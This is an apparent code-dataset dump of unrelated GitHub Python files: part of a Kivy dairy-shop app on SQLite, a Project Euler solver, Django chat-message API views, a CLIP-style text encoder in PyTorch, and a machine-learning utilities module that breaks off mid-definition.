\\t\\t\\t\\t\\t{i[3]}\\t\\t\\t\\t\\t{i[4]}''')\r\n \r\n conn.commit() \r\n conn.close() \r\n return 0\r\n except:\r\n warning(\"Something Roung\")\r\n return 0\r\ndef print_1(print_file_name):\r\n if '-' in print_file_name:\r\n try:\r\n file_name =print_file_name.split(\"-\")\r\n if len(file_name)==3:\r\n datebase_name =file_name[0]\r\n datebase_name=datebase_name.lower()\r\n datebase_name=datebase_name.capitalize()\r\n name =datebase_name+\"-\"+file_name[1]+\"-\"+file_name[2]\r\n os.startfile(f\"{name}.csv\")\r\n # os.startfile(f\"{x3}.xlsx\") \r\n except:\r\n file_name =print_file_name.split(\"-\")\r\n if len(file_name)==3:\r\n datebase_name =file_name[0]\r\n datebase_name=datebase_name.lower()\r\n datebase_name=datebase_name.capitalize()\r\n table_name =file_name[1]+file_name[2]\r\n csv_name =datebase_name+\"-\"+file_name[1]+\"-\"+file_name[2]\r\n # name,database_name=spliter(print_file_name)\r\n conn =sqlite3.connect(f\"{datebase_name}.db\")\r\n cur =conn.cursor()\r\n df =pd.read_sql(f\"select * from {table_name}\",conn)\r\n df.to_csv(f\"{csv_name}.csv\",index =False)\r\n # df.to_exel(f\"{csv_name}.xlsx\")\r\n \r\n os.startfile(f\"{csv_name}.csv\")\r\n # os.startfile(f\"{csv_name}.xlsx\")\r\n \r\n conn.commit()\r\n conn.close() \r\n else:\r\n try:\r\n print_file_name =print_file_name.lower()\r\n print_file_name =print_file_name.capitalize()\r\n conn =sqlite3.connect(f\"{print_file_name}.db\")\r\n cur =conn.cursor()\r\n Qunatity_total=conn.execute(\"select Qunatity from info\")\r\n sum1=0\r\n for i in Qunatity_total:\r\n sum1=sum1+i[0]\r\n \r\n total=conn.execute(\"select Total from info\")\r\n sum2=0\r\n for i in total:\r\n sum2=sum2+i[0]\r\n \r\n id=\"\"\r\n User_Name=\"\"\r\n Fat=\"\"\r\n Rate=\"\"\r\n conn.execute('''INSERT INTO info(Id ,Date ,Name ,Fat ,Qunatity ,Rate ,Total ) VALUES (?,?,?,?,?,?,?)''',(id,Date_text,User_Name,Fat,sum1,Rate,sum2)) \r\n \r\n df =pd.read_sql(\"select * from info\",conn)\r\n x = datetime.datetime.now()\r\n x1 =str(x.year)\r\n x2 =x.strftime(\"%B\")\r\n x2=x2.lower()\r\n x3 =print_file_name+\"-\"+x2+\"-\"+x1\r\n\r\n df.to_csv(f\"{x3}.csv\")\r\n # df.to_exel(f\"{x3}.xlsx\")\r\n x4 =x2+x1\r\n cur.execute(f\" ALTER TABLE info RENAME TO {x4};\")\r\n conn.commit()\r\n conn.close()\r\n \r\n os.startfile(f\"{x3}.csv\")\r\n # os.startfile(f\"{x3}.xlsx\")\r\n except:\r\n pass \r\n\r\n\r\ndef edit_1(database_name,date,fat,quantity,rate,name,line_no):\r\n try:\r\n conn =sqlite3.connect(f\"{database_name}.db\")\r\n cur =conn.cursor()\r\n if line_no.text!=\"\":\r\n line_no =int(line_no.text)\r\n result =cur.execute(\"select Id from info\")\r\n ls =[]\r\n for i in result:\r\n ls.append(i[0])\r\n if line_no in ls:\r\n try:\r\n if fat.text!=\"\":\r\n fat =int(fat.text)\r\n cur.execute(f'''Update info set Fat ={fat} where id = {line_no}''')\r\n \r\n if quantity.text!=\"\":\r\n quantity =int(quantity.text)\r\n cur.execute(f'''Update info set Qunatity ={quantity} where id = {line_no}''') \r\n \r\n if rate.text!=\"\":\r\n rate =int(rate.text)\r\n cur.execute(f'''Update info set Rate ={rate} where id = {line_no}''')\r\n \r\n if name.text!=\"\":\r\n name =name.text\r\n cur.execute(f'''Update info set Name={name} where id = {line_no}''') \r\n \r\n if date.text!=\"\":\r\n date =date.text\r\n cur.execute(f'''Update info set Date ={date} where id = {line_no}''') \r\n \r\n if rate.text!=\"\" and quantity.text!=\"\" and fat.text!=\"\": \r\n fat =int(fat.text)\r\n quantity =int(quantity.text)\r\n rate =int(rate.text)\r\n total =fat*quantity*rate\r\n total =int(total/65)\r\n print(total)\r\n # cur.execute(f'''Update info set Total ={total} where id = {line_no}''') \r\n warning(\"Edit Successfully\") \r\n except:\r\n pass\r\n conn.commit()\r\n conn.close()\r\n\r\n except:\r\n pass\r\n \r\n\r\n\r\ndef delete_Entry_2(datebase_name,date1):\r\n try:\r\n line_number =date1.text\r\n conn =sqlite3.connect(f\"{datebase_name}.db\")\r\n cur=conn.cursor()\r\n conn.execute( f\"delete from info where Id ={line_number}\")\r\n conn.commit()\r\n conn.close()\r\n warning(\"Delete Successfully\")\r\n except:\r\n warning(\"Error\")\r\ndef delete_Entry_1(date2):\r\n line_number=date2.text\r\n try: \r\n cur =conn.cursor() \r\n conn.execute( f\"delete from info where Id ={line_number}\")\r\n conn.commit()\r\n conn.close()\r\n except:\r\n warning(\"Error \") \r\n\r\nclass Crate_Window(Screen):\r\n def __init__(self,**kwags):\r\n super().__init__(**kwags)\r\n \r\n\r\n def new(self):\r\n self.ids.Serch_text.text=\"\"\r\n self.ids.Address_text.text=\"\"\r\n self.ids.ph_text.text=\"\"\r\n \r\n def Create_new(self):\r\n try:\r\n if self.ids.Serch_text.text!=\"\" and self.ids.Address_text.text!=\"\"and self.ids.ph_text.text!=\"\":\r\n User_entry_text =self.ids.Serch_text.text\r\n Address_text =self.ids.Address_text.text\r\n ph_text =int(self.ids.ph_text.text)\r\n except:\r\n warning(\"INVALID ENTRY\")\r\n \r\n try: \r\n User_entry_text =User_entry_text.lower() \r\n User_entry_text =User_entry_text.capitalize()\r\n conn =sqlite3.connect(\"User_Names.db\")\r\n cur =conn.cursor()\r\n result =cur.execute('''select Name from info''')\r\n ls=[]\r\n for i in result:\r\n ls.append(i[0]) \r\n if User_entry_text in ls:\r\n warning(\"TRY ANOTHER NAME\")\r\n else:\r\n conn.commit()\r\n r2 =cur.execute(\"select id from info\")\r\n lwa =[]\r\n for i in r2:\r\n lwa.append(i[0]) \r\n if len(lwa) ==0: \r\n cur.execute('''insert into info(Id,Date,Name,Address,Phone)values(?,?,?,?,?)''',(1,Date_text,User_entry_text,Address_text,ph_text))\r\n warning(\"SAVE SUCCESSFULLY\")\r\n else:\r\n a2=lwa.pop()\r\n a2=a2+1\r\n cur.execute('''insert into info(Id,Date,Name,Address,Phone)values(?,?,?,?,?)''',(a2,Date_text,User_entry_text,Address_text,ph_text))\r\n\r\n warning(\"SAVE SUCCESSFULLY\")\r\n conn.commit()\r\n conn.close() \r\n except:\r\n warning(\"SOMETHING ROUNG\")\r\n\r\n \r\n def Delete_crete(self):\r\n layout = BoxLayout(orientation='vertical',spacing =20) \r\n date1 =TextInput(id='line',font_size=20,multiline =False,hint_text=\"Enter Name\",size_hint_y=None,height=40,size_hint_x=None,width =350)\r\n okButton = Button(text = \"Done\",bold=\"True\",font_size=20,size_hint_y=None,height=40,size_hint_x=None,width =100) \r\n closeButton = Button(text = \"Close\",bold=\"True\",font_size=20,size_hint_y=None,height=40,size_hint_x=None,width =100) \r\n layout.add_widget(date1) \r\n layout.add_widget(okButton) \r\n layout.add_widget(closeButton) \r\n popup = Popup(title ='SURBHI DAIRY', content = layout,size_hint =(None, None), size =(450,350) ) \r\n popup.open() \r\n closeButton.bind(on_press = popup.dismiss)\r\n okButton.bind(on_release = popup.dismiss)\r\n okButton.bind(on_press=lambda x:delete_crete(date1))\r\n \r\ns =ScreenManager()\r\ns.add_widget(Main_Window(name =\"Main_Window\"))\r\ns.add_widget(Entry_window(name =\"Entry_window\"))\r\ns.add_widget(See_window(name =\"See_window\"))\r\ns.add_widget(Crate_Window(name =\"Crate_Window\"))\r\n\r\n\r\ndef delete_crete(date1):\r\n input_data =date1.text\r\n input_data =input_data .lower() \r\n input_data =input_data .capitalize()\r\n \r\n conn =sqlite3.connect(\"User_Names.db\")\r\n try:\r\n cur =conn.cursor()\r\n result =cur.execute('''select Name from info''')\r\n ls=[]\r\n \r\n for i in result:\r\n ls.append(i[0]) \r\n if input_data in ls:\r\n conn.execute('DELETE FROM info WHERE Name = (?)', (input_data,)) \r\n conn1=sqlite3.connect(f\"{input_data}.db\")\r\n cur1 =conn1.cursor()\r\n try:\r\n cur1.execute('''drop table info''')\r\n except:\r\n pass \r\n conn1.commit()\r\n conn1.close()\r\n warning(\"Delete Successfully\")\r\n else:\r\n warning(\"User not Ragisterd\")\r\n\r\n except:\r\n pass\r\n conn.commit()\r\n conn.close() \r\n \r\n \r\ndef spliter(a): \r\n r =a.split('-')\r\n lenght =len(r)\r\n r[0]=r[0].lower()\r\n r[0]=r[0].capitalize()\r\n if lenght==3:\r\n b =r[0]+\"-\"+r[1]+\"-\"+r[2]\r\n return b,r[0]\r\n \r\n\r\n\r\ndef warning(a):\r\n layout = GridLayout(cols = 1, padding = 10) \r\n popupLabel = Label(text = f\"{a}\") \r\n closeButton = Button(text = \"Close\",bold=\"True\",font_size=20) \r\n layout.add_widget(popupLabel) \r\n layout.add_widget(closeButton) \r\n popup = Popup(title ='SURBHI DAIRY', content = layout,size_hint =(None, None), size =(250,250)) \r\n popup.open() \r\n closeButton.bind(on_press = popup.dismiss)\r\n\r\n\r\nclass myclass(App):\r\n def build(self):\r\n self.title =\"Rohit Dairy\"\r\n return s\r\n\r\nif __name__ == \"__main__\":\r\n myclass().run() ","repo_name":"MohitKumar-stack/python-kivy-Milk-Shop-Management-system","sub_path":"Project.py","file_name":"Project.py","file_ext":"py","file_size_in_byte":28584,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"27689367811","text":"\nimport os\nimport math\nimport time\n\n'''\nA palindromic number reads the same both ways.\n\nThe largest palindrome made from the product of two 2-digit numbers is 9009 = 91 x 99.\n\nFind the largest palindrome made from the product of two 3-digit numbers.\n'''\n\n#BruteForce approach\ndef is_palindrome(n_string):\n length = len(n_string)\n i = 0\n j = length-1\n result = True\n while i < math.ceil(length/2):\n if n_string[i] != n_string[j]:\n result = False\n break\n i = i+1\n j = j-1\n return result\n\nif __name__ == '__main__':\n\n stime = time.time()\n\n#upperdiagonal of products\n#distance from [0][0] = 0 [0][1] = 1 [0][2] = 2 [1][1] = 2\n left = 999\n right = 999\n distance = int(0)\n found = False\n while True:\n i = math.ceil(distance/2)\n k = math.floor(distance/2)\n while i >= 0:\n product = (left-i)*(right-k)\n if is_palindrome(str(product)):\n print(product)\n found = True\n break\n i = i - 1\n k = k + 1\n if found:\n break\n distance = distance + 1\n\n print('Runtime:', time.time() - stime)\n\n","repo_name":"AdamAtkins-Public/current","sub_path":"Project_Euler/python/p004.py","file_name":"p004.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73727331927","text":"from rest_framework.decorators import api_view,permission_classes\nfrom rest_framework.permissions import AllowAny,IsAuthenticated\nfrom .models import *\nfrom .serializers import *\nfrom authentication.models import User\nfrom rest_framework.response import Response\n# Create your views here.\nfrom django.db.models import Q\n\n\n@api_view(['POST'])\n@permission_classes([AllowAny])\ndef CreateMessageView(request):\n try:\n data = request.data\n from_user = User.objects.get(id=data['from_user'])\n to = User.objects.get(id=data['to'])\n message = data['message']\n file = data['file']\n new_message = Messages.objects.create(from_user=from_user, to=to, message=message, file=file)\n new_message.save()\n return Response({'message':'message sent'})\n except KeyError:\n pass\n\n try:\n data = request.data\n from_user = User.objects.get(id=data['from_user'])\n to = User.objects.get(id=data['to'])\n message = data['message']\n new_message = Messages.objects.create(from_user=from_user, to=to, message=message)\n new_message.save()\n return Response({'message':'message sent'})\n\n\n except KeyError:\n pass\n\n try:\n data = request.POST\n from_user = User.objects.get(id=data['from_user'])\n group = Groups.objects.get(id=data['group'])\n message = data['message']\n file = request.FILES.get('file')\n new_message = Messages.objects.create(from_user=from_user, group=group, message=message, file=file)\n new_message.save()\n return Response({'message':'message sent'})\n\n except KeyError:\n pass\n\n try:\n data = request.POST\n from_user = User.objects.get(id=data['from_user'])\n group = Groups.objects.get(id=data['group'])\n # message = data['message']\n file = request.FILES.get('file')\n new_message = Messages.objects.create(from_user=from_user, group=group, file=file)\n new_message.save()\n return Response({'message':'message sent'})\n\n except KeyError:\n pass\n\n try:\n data = request.POST\n from_user = User.objects.get(id=data['from_user'])\n to = User.objects.get(id=data['to'])\n # message = data['message']\n file = request.FILES.get('file')\n new_message = Messages.objects.create(from_user=from_user, to=to, file=file)\n new_message.save()\n return Response({'message':'message sent'})\n\n except KeyError:\n pass\n\n try:\n data = request.data\n from_user = User.objects.get(id=data['from_user'])\n group = Groups.objects.get(id=data['group'])\n message = data['message']\n new_message = Messages.objects.create(from_user=from_user, group=group, message=message)\n new_message.save()\n return Response({'message':'message sent'})\n except:\n return Response({'message': 'Fail'})\n\n\n# {\n# \"from_user\":1,\n# \"to\":2,\n# \"group\":1,\n# \"message\":\"hey group\",\n# \"file\":\"\"\n# }\n\n\n@api_view(['POST'])\n@permission_classes([AllowAny])\ndef CreateGroupView(request):\n try:\n data = request.data\n created_by = User.objects.get(id=data['user_id'])\n group_name = data['name']\n description = data['description']\n new_group = Groups.objects.create(created_by=created_by, group_name=group_name, description=description)\n new_group.save()\n return Response({'sms': 'success'})\n except:\n data = request.data\n created_by = User.objects.get(id=data['user_id'])\n group_name = data['name']\n new_group = Groups.objects.create(created_by=created_by, group_name=group_name)\n new_group.save()\n return Response({'sms': 'success'})\n\n\n# {\n# \"user_id\":1,\n# \"name\":\"Myg\",\n# \"description\":\"hey there\"\n# }\n\n\n@api_view(['POST'])\n@permission_classes([AllowAny])\ndef CreateGroupMemberView(request):\n data = request.data\n members = data['members']\n group = Groups.objects.get(id=data['group_id'])\n for memb_id in members:\n user = User.objects.get(id=memb_id)\n group_user = UserGroup.objects.create(group_id=group, user_id=user)\n group_user.save()\n return Response({'message':'successful creating group members'})\n\n# {\n# \"group_id\":1,\n# \"members\":[1,2]\n# }\n\n\n@api_view(['GET'])\n@permission_classes([AllowAny])\n\ndef UserGetMessageView(request,from_, to_):\n from_ = User.objects.get(id=from_)\n to_ = User.objects.get(id=to_)\n queryset = Messages.objects.filter(Q(from_user=to_)&Q(to=from_))\n print(queryset)\n queryset1 = Messages.objects.filter(Q(from_user=from_)&Q(to=to_))\n print(queryset1)\n m = []\n if len(queryset) > 0:\n\n for data in queryset:\n if data.file:\n d = {\n 'from_user': data.from_user.username,\n 'from_user_id': data.from_user.id,\n # 'to': data.group.id,\n 'file': data.file.name,\n 'message': data.message,\n 'created_at': data.created_at\n }\n else:\n d = {\n 'from_user': data.from_user.username,\n 'from_user_id': data.from_user.id,\n # 'to': data.group.id,\n # 'file': data.file,\n 'message': data.message,\n 'created_at': data.created_at\n }\n m.append(d)\n\n if len(queryset1) > 0:\n\n for data in queryset1:\n if data.file:\n d = {\n 'from_user': data.from_user.username,\n 'from_user_id': data.from_user.id,\n # 'to': data.group.id,\n 'file': data.file.name,\n 'message': data.message,\n 'created_at': data.created_at\n }\n else:\n d = {\n 'from_user': data.from_user.username,\n 'from_user_id': data.from_user.id,\n # 'to': data.group.id,\n # 'file': data.file,\n 'message': data.message,\n 'created_at': data.created_at\n }\n m.append(d)\n\n\n return Response(m)\n\n\n\n@api_view(['GET'])\n@permission_classes([AllowAny])\ndef GroupGetMessageView(request,grp):\n group = Groups.objects.get(id=grp)\n message = Messages.objects.filter(group=group)\n m = []\n for data in message:\n if data.file:\n d = {\n 'from_user': data.from_user.username,\n 'from_user_id': data.from_user.id,\n # 'to': data.group.id,\n 'file': data.file.name,\n 'message': data.message,\n 'created_at': data.created_at\n }\n else:\n d = {\n 'from_user': data.from_user.username,\n 'from_user_id': data.from_user.id,\n # 'to': data.group.id,\n # 'file': data.file,\n 'message': data.message,\n 'created_at': data.created_at\n }\n m.append(d)\n print(m)\n # list = [entry for entry in message]\n return Response(m)\n\n\n@api_view(['GET'])\n@permission_classes([AllowAny])\ndef GroupGetView(request):\n groups = Groups.objects.values('id', 'created_by', 'group_name', 'description', 'created_at').filter(is_deleted=False)\n\n return Response(groups)\n\n@api_view(['GET'])\n@permission_classes([AllowAny])\ndef FilesView(request):\n groups = Messages.objects.all()\n files = []\n if len(groups)>0:\n for data in groups:\n if data.file:\n print('here')\n file_size = data.file.size\n\n # Get the human-readable size\n if file_size < 1024:\n size_text = f\"{file_size} B\"\n elif file_size < 1024 ** 2:\n size_text = f\"{file_size / 1024:.2f} KB\"\n elif file_size < 1024 ** 3:\n size_text = f\"{file_size / (1024 ** 2):.2f} MB\"\n else:\n size_text = f\"{file_size / (1024 ** 3):.2f} GB\"\n files.append({'name': data.file.name, 'storage': size_text})\n else:\n pass\n\n return Response(files)","repo_name":"michaelcyril/chat-system-new","sub_path":"ChatPannel/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41449414433","text":"import torch\nimport torch.nn as nn\nfrom transformer import Transformer\nfrom utils import ModifiedLayerNorm\n\nclass TransformerTextEncoder(nn.Module):\n def __init__(\n self,\n output_dim: int, # Dimension of the output [possible values from the paper: 512, 768]\n vocab_size: int = 49152, # Define size of vocabulary\n max_length: int = 76, # Define maximum sequence length\n width: int = 512, # Dimension for the embeddings [possible values from the paper: 512, 768]\n n_blocks: int = 12, # Number of blocks that compose the transformer (i.e. the depth) [possible values from the paper: 12, 16]\n n_heads: int = 8, # Number of heads for each multi-head attention layer [possible values from the paper: 8, 12]\n head_dim: int = 64, # Dimension of each multi-head layer\n dropout: float = 0.5, # Define dropout\n tensor_type: torch.TensorType = torch.float # Define type of tensor to convert input data to\n ):\n super().__init__()\n\n self.max_length = max_length\n self.n_blocks = n_blocks\n self.width = width\n self.tensor_type = tensor_type\n\n # Define token and positional embeddings\n self.token_embedding = nn.Embedding(num_embeddings=vocab_size, embedding_dim=width)\n self.positional_embedding = nn.Parameter(torch.empty(max_length, width))\n\n # Define transformer\n self.transformer = Transformer(n_embeddings=width, n_blocks=n_blocks, n_heads=n_heads, head_dim=head_dim, dropout=dropout)\n\n # Define modified layer normalization\n self.layernorm = ModifiedLayerNorm(width)\n\n # Define projection\n self.projection = nn.Parameter(torch.empty(width, output_dim))\n\n # Initialize parameters\n self.initialize_parameters()\n\n def get_mask(self, batch: int):\n \"\"\" Function that creates the mask for the transformer \"\"\"\n mask = torch.empty(self.max_length, batch) # Create empty mask\n # mask.fill_(float('-inf')) # Fill the entire mask with -inf\n mask.triu_(diagonal=1) # Zero out the diagonal and the entries under the diagonal\n return mask\n\n def initialize_parameters(self):\n \"\"\" Function that handles the parameters initialization \"\"\"\n # Init parameters for token and positional embeddings\n nn.init.normal_(self.token_embedding.weight, std=0.02)\n nn.init.normal_(self.positional_embedding, std=0.01)\n\n # Init parameters for multihead attention and transformer's feedforward network\n proj_std = (self.width ** -0.5) * ((2 * self.n_blocks) ** -0.5)\n attn_std = self.width ** -0.5\n fc_std = (2 * self.width) ** -0.5\n for attention, feedforward in self.transformer.layers:\n nn.init.normal_(attention.to_qkv.weight, std=attn_std)\n nn.init.normal_(attention.to_out[0].weight, std=proj_std)\n nn.init.normal_(feedforward.net[0].weight, std=fc_std)\n nn.init.normal_(feedforward.net[3].weight, std=proj_std)\n\n # Init parameters for projection\n nn.init.normal_(self.projection, std=(self.width ** -0.5))\n\n def forward(self, x: torch.Tensor):\n # Get index of the highest number along last dimension\n idx_max_n = x.argmax(dim=-1)\n \n # Apply token and positional embeddings\n x = self.token_embedding(x).type(self.tensor_type) # shape = [batch_size, n_ctx, d_model]\n x = x + self.positional_embedding.type(self.tensor_type)\n x = x.permute(1, 0, 2)\n\n # Define mask\n mask = self.get_mask(batch=x.size()[1])\n \n # Apply transformer, permute and normalize\n x = self.transformer(x, mask=mask)\n x = x.permute(1, 0, 2) # shape = [batch_size, n_ctx, transformer.width]\n x = self.layernorm(x).type(self.tensor_type)\n\n # Take features from the eot embedding (eot_token is the highest number in each sequence)\n x = x[torch.arange(x.shape[0]), idx_max_n] @ self.projection\n\n return x\n","repo_name":"cgMuro/State-of-Art","sub_path":"CLIP/text_encoder.py","file_name":"text_encoder.py","file_ext":"py","file_size_in_byte":4065,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"38831412197","text":"import io\nimport json\nimport logging\nimport os\nimport errno\nimport pickle\nimport time\n\nimport numpy as np\nimport sklearn.metrics\nimport torch\nfrom torch import nn\n\nfrom lib.pc_utils import colorize_pointcloud, save_point_cloud\nfrom lib.losses.FocalLoss import FocalLoss\n\ndef load_state_with_same_shape(model, weights, prefix=''):\n\n model_state = model.state_dict()\n if list(weights.keys())[0].startswith('module.'):\n logging.info(\"Loading multigpu weights with module. prefix...\")\n weights = {k.partition('module.')[2]: weights[k] for k in weights.keys()}\n\n if list(weights.keys())[0].startswith('model.'):\n logging.info(\"Loading Pytorch-Lightning weights from state\")\n weights = {k.partition('model.')[2]: weights[k] for k in weights.keys()}\n\n if list(weights.keys())[0].startswith('encoder.'):\n logging.info(\"Loading multigpu weights with encoder. prefix...\")\n weights = {k.partition('encoder.')[2]: weights[k] for k in weights.keys()}\n\n # print(weights.items())\n # print(\"===================\")\n # print(\"===================\")\n # print(\"===================\")\n # print(\"===================\")\n # print(\"===================\")\n # print(model_state)\n\n filtered_weights = {\n k: v for k, v in weights.items() if k in model_state and v.size() == model_state[k].size()\n }\n logging.info(\"Loading weights:\" + ', '.join(filtered_weights.keys()))\n\n return filtered_weights\n\n\ndef checkpoint(model, optimizer, epoch, iteration, config, best_val=None, best_val_iter=None, postfix=None):\n mkdir_p(config.log_dir)\n if config.overwrite_weights:\n if postfix is not None:\n filename = f\"checkpoint_{config.wrapper_type}{config.model}{postfix}.pth\"\n else:\n filename = f\"checkpoint_{config.wrapper_type}{config.model}.pth\"\n else:\n filename = f\"checkpoint_{config.wrapper_type}{config.model}_iter_{iteration}.pth\"\n checkpoint_file = config.log_dir + '/' + filename\n state = {\n 'iteration': iteration,\n 'epoch': epoch,\n 'arch': config.model,\n 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict()\n }\n if best_val is not None:\n state['best_val'] = best_val\n state['best_val_iter'] = best_val_iter\n json.dump(vars(config), open(config.log_dir + '/config.json', 'w'), indent=4)\n torch.save(state, checkpoint_file)\n logging.info(f\"Checkpoint saved to {checkpoint_file}\")\n # Delete symlink if it exists\n if os.path.exists(f'{config.log_dir}/weights.pth'):\n os.remove(f'{config.log_dir}/weights.pth')\n # Create symlink\n os.system(f'cd {config.log_dir}; ln -s {filename} weights.pth')\n\n\ndef precision_at_one(pred, target, ignore_label=255):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n # batch_size = target.size(0) * target.size(1) * target.size(2)\n pred = pred.view(1, -1)\n target = target.view(1, -1)\n correct = pred.eq(target)\n correct = correct[target != ignore_label]\n correct = correct.view(-1)\n if correct.nelement():\n return correct.float().sum(0).mul(100.0 / correct.size(0)).item()\n else:\n return 0.\n\n\ndef fast_hist(pred, label, n):\n k = (label >= 0) & (label < n)\n return np.bincount(n * label[k].astype(int) + pred[k], minlength=n ** 2).reshape(n, n)\n\n\ndef fast_hist_torch(pred, label, n):\n k = (label >= 0) & (label < n)\n return torch.bincount(n * label[k].int() + pred[k], minlength=n ** 2).reshape(n, n)\n\n\ndef per_class_iu(hist):\n with np.errstate(divide='ignore', invalid='ignore'):\n return np.diag(hist) / (hist.sum(1) + hist.sum(0) - np.diag(hist))\n\n\ndef per_class_iu_torch(hist):\n with np.errstate(divide='ignore', invalid='ignore'):\n return torch.diag(hist) / (hist.sum(1) + hist.sum(0) - torch.diag(hist))\n\n\ndef loss_by_name(loss_name, ignore_index=0, alpha=0.5, gamma=2.0, reduction='mean', weight=None):\n if loss_name == 'focal':\n return FocalLoss(alpha, gamma, reduction=reduction, ignore_index=ignore_index)\n elif loss_name == 'cross_entropy':\n return nn.CrossEntropyLoss(weight=weight, ignore_index=ignore_index, reduction=reduction)\n else:\n return None\n\ndef save_obj(output_path, obj):\n with open(output_path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\ndef load_obj(intput_path ):\n with open(intput_path, 'rb') as f:\n return pickle.load(f)\n\nclass WithTimer(object):\n \"\"\"Timer for with statement.\"\"\"\n\n def __init__(self, name=None):\n self.name = name\n\n def __enter__(self):\n self.tstart = time.time()\n\n def __exit__(self, type, value, traceback):\n out_str = 'Elapsed: %s' % (time.time() - self.tstart)\n if self.name:\n logging.info('[{self.name}]')\n logging.info(out_str)\n\n\nclass Timer(object):\n \"\"\"A simple timer.\"\"\"\n\n def __init__(self):\n self.total_time = 0.\n self.calls = 0\n self.start_time = 0.\n self.diff = 0.\n self.average_time = 0.\n\n def reset(self):\n self.total_time = 0\n self.calls = 0\n self.start_time = 0\n self.diff = 0\n self.averate_time = 0\n\n def tic(self):\n # using time.time instead of time.clock because time time.clock\n # does not normalize for multithreading\n self.start_time = time.time()\n\n def toc(self, average=True, with_call=True):\n self.diff = time.time() - self.start_time\n self.total_time += self.diff\n if with_call or self.calls == 0:\n self.calls += 1\n self.average_time = self.total_time / self.calls\n if average:\n return self.average_time\n else:\n return self.diff\n\n\nclass ExpTimer(Timer):\n \"\"\" Exponential Moving Average Timer \"\"\"\n\n def __init__(self, alpha=0.5):\n super(ExpTimer, self).__init__()\n self.alpha = alpha\n\n def toc(self):\n self.diff = time.time() - self.start_time\n self.average_time = self.alpha * self.diff + \\\n (1 - self.alpha) * self.average_time\n return self.average_time\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / (self.count + 10e-5)\n\n\ndef mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise\n\n\ndef read_txt(path):\n \"\"\"Read txt file into lines.\n \"\"\"\n with open(path) as f:\n lines = f.readlines()\n lines = [x.strip() for x in lines]\n return lines\n\n\ndef debug_on():\n import sys\n import pdb\n import functools\n import traceback\n\n def decorator(f):\n\n @functools.wraps(f)\n def wrapper(*args, **kwargs):\n try:\n return f(*args, **kwargs)\n except Exception:\n info = sys.exc_info()\n traceback.print_exception(*info)\n pdb.post_mortem(info[2])\n\n return wrapper\n\n return decorator\n\n\ndef get_prediction(dataset, output, target):\n return output.max(1)[1]\n\n\ndef count_parameters(model):\n return sum(p.numel() for p in model.parameters() if p.requires_grad)\n\n\ndef get_torch_device(is_cuda):\n return torch.device('cuda' if is_cuda else 'cpu')\n\n\nclass HashTimeBatch(object):\n\n def __init__(self, prime=5279):\n self.prime = prime\n\n def __call__(self, time, batch):\n return self.hash(time, batch)\n\n def hash(self, time, batch):\n return self.prime * batch + time\n\n def dehash(self, key):\n time = key % self.prime\n batch = key / self.prime\n return time, batch\n\n\ndef save_rotation_pred(iteration, pred, dataset, save_pred_dir):\n \"\"\"Save prediction results in original pointcloud scale.\"\"\"\n decode_label_map = {}\n for k, v in dataset.label_map.items():\n decode_label_map[v] = k\n pred = np.array([decode_label_map[x] for x in pred], dtype=np.int)\n out_rotation_txt = dataset.get_output_id(iteration) + '.txt'\n out_rotation_path = save_pred_dir + '/' + out_rotation_txt\n np.savetxt(out_rotation_path, pred, fmt='%i')\n\n\ndef save_predictions(coords, upsampled_pred, transformation, dataset, config, iteration,\n save_pred_dir):\n \"\"\"Save prediction results in original pointcloud scale.\"\"\"\n from lib.dataset import OnlineVoxelizationDatasetBase\n if dataset.IS_ONLINE_VOXELIZATION:\n assert transformation is not None, 'Need transformation matrix.'\n iter_size = coords[:, -1].max() + 1 # Normally batch_size, may be smaller at the end.\n if dataset.IS_TEMPORAL: # Iterate over temporal dilation.\n iter_size *= config.temporal_numseq\n for i in range(iter_size):\n # Get current pointcloud filtering mask.\n if dataset.IS_TEMPORAL:\n j = i % config.temporal_numseq\n i = i // config.temporal_numseq\n batch_mask = coords[:, 0].numpy() == i\n if dataset.IS_TEMPORAL:\n batch_mask = np.logical_and(batch_mask, coords[:, -1].numpy() == j)\n # Calculate original coordinates.\n coords_original = coords[:, 1:].numpy()[batch_mask] + 0.5\n if dataset.IS_ONLINE_VOXELIZATION:\n # Undo voxelizer transformation.\n curr_transformation = transformation[i, :16].numpy().reshape(4, 4)\n xyz = np.hstack((coords_original, np.ones((batch_mask.sum(), 1))))\n orig_coords = (np.linalg.inv(curr_transformation) @ xyz.T).T\n else:\n orig_coords = coords_original\n orig_pred = upsampled_pred[batch_mask]\n # Undo ignore label masking to fit original dataset label.\n if dataset.IGNORE_LABELS:\n if isinstance(dataset, OnlineVoxelizationDatasetBase):\n label2masked = dataset.label2masked\n maskedmax = label2masked[label2masked < 2000].max() + 1\n masked2label = [label2masked.tolist().index(i) for i in range(maskedmax)]\n orig_pred = np.take(masked2label, orig_pred)\n else:\n decode_label_map = {}\n for k, v in dataset.label_map.items():\n decode_label_map[v] = k\n orig_pred = np.array([decode_label_map[x] for x in orig_pred], dtype=np.int)\n # Determine full path of the destination.\n full_pred = np.hstack((orig_coords[:, :3], np.expand_dims(orig_pred, 1)))\n filename = 'pred_%04d_%02d.npy' % (iteration, i)\n if dataset.IS_TEMPORAL:\n filename = 'pred_%04d_%02d_%02d.npy' % (iteration, i, j)\n # Save final prediction as npy format.\n np.save(os.path.join(save_pred_dir, filename), full_pred)\n\n\ndef visualize_results(coords, colors, target,\n prediction, config,\n iteration, num_labels,\n train_iteration=None,\n valid_labels=None,\n save_npy=False,\n scene_name='',\n refinement_pred=None,\n refinement_target=None,\n 